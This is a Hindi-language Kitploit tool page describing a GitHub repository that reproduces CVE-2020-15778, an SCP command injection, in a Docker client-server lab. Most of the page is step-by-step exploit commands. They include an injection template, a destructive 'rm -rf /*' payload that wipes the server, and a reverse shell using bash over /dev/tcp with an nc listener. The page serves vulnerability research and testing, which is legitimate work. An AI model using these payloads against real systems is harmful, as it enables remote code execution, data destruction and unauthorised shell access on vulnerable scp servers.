Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-15778 — CVE-2020-15778 SCP कमांड इंजेक्शन शोषण को Docker-आधारित क्लाइंट-सर्वर सेटअप के साथ पुन: उत्पन्न करता है, जो दूरस्थ कोड निष्पादन और रिवर्स शेल पेलोड के परीक्षण के लिए है। | Kitploit
उपकरण/GitHubGitHub/yifanzhg/cve-2020-15778
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

CVE-2020-15778 SCP कमांड इंजेक्शन शोषण को Docker-आधारित क्लाइंट-सर्वर सेटअप के साथ पुन: उत्पन्न करता है, जो दूरस्थ कोड निष्पादन और रिवर्स शेल पेलोड के परीक्षण के लिए है।

रिपॉजिटरी देखें
332 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-15778

परिचय

यह रिपॉजिटरी CVE-2020-15778 को पुनरुत्पादित करता है।

चरण

  1. scp सर्वर और क्लाइंट के लिए डॉकर इमेज बनाएं
root@kitploit:~
cd client
docker build -t client-cve .
root@kitploit:~
cd server
docker build -t server-cve .
  1. scp सर्वर को कंटेनर में चालू करें।
root@kitploit:~
docker run -d -P --name scp-server server-cve

scp सर्वर का आंतरिक आईपी पता इस प्रकार प्राप्त करें:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. क्लाइंट को कंटेनर में चलाएं।
root@kitploit:~
docker run --name scp-client -i -t client-cve
  1. क्लाइंट में scp कमांड कॉल करके अपना खुद का शेल कमांड scp सर्वर में इंजेक्ट करें।

क्लाइंट टर्मिनल में, चलाएं:

root@kitploit:~
scp nil.txt root@<scp सर्वर का आंतरिक IP>:'`आपकी कमांड`/tmp'

पासवर्ड "PASSWORD" है।

उदाहरण

यहां इस शोषण के कुछ उदाहरण दिए गए हैं।

  1. सर्वर में सब कुछ हटाकर उसे क्रैश करें।
root@kitploit:~
scp nil.txt root@<scp सर्वर का आंतरिक IP>:'`rm -rf /*`/tmp'
  1. scp सर्वर के bash को क्लाइंट में प्रतिबिंबित करें (ssh का अनुकरण)।

क्लाइंट मशीन पर एक पोर्ट पर सुनें।

root@kitploit:~
nc -lvvp 8080

scp का उपयोग करके सर्वर को इंटरैक्टिव bash को क्लाइंट मशीन पर मैप करने के लिए बाध्य करें।

root@kitploit:~
scp nil.txt root@<scp क्लाइंट का आंतरिक IP>:'`bash -i >& /dev/tcp/<scp क्लाइंट का आंतरिक IP>/8080 0>& 1`/tmp'

क्लाइंट आईपी पता इस प्रकार प्राप्त किया जा सकता है:

root@kitploit:~
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
टूल डाउनलोड करें